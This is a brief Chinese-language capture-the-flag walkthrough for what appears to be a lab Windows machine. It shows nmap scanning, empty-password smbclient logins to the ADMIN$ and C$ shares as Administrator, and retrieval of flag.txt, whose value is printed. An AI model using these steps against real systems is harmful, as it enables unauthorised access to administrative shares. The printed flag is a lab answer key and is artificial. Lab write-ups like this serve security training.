1.主机发现
nmap -v -sV -sC 10.129.216.144
开放了三个端口
2.smbclient登录
# 先查看smb下存放了哪些东西
smbclient -L 10.129.216.144 -U Administrator
# 需要注意的是,默认登录用户是root,对于windows的靶机,肯定不能用root登录
空密码登录成功
# smbclient远程连接
smbclient //10.129.216.144/ADMIN$ -U Administrator
# 空密码登录成功
同样可以去C盘下查看
smbclient //10.129.216.144/C$ -U Administrator
# 查找一番后
cd /Administrator/Desktop
# 有flag.txt
get flag.txt
# flag{f751c19eda8f61ce81827e6930a1f40c}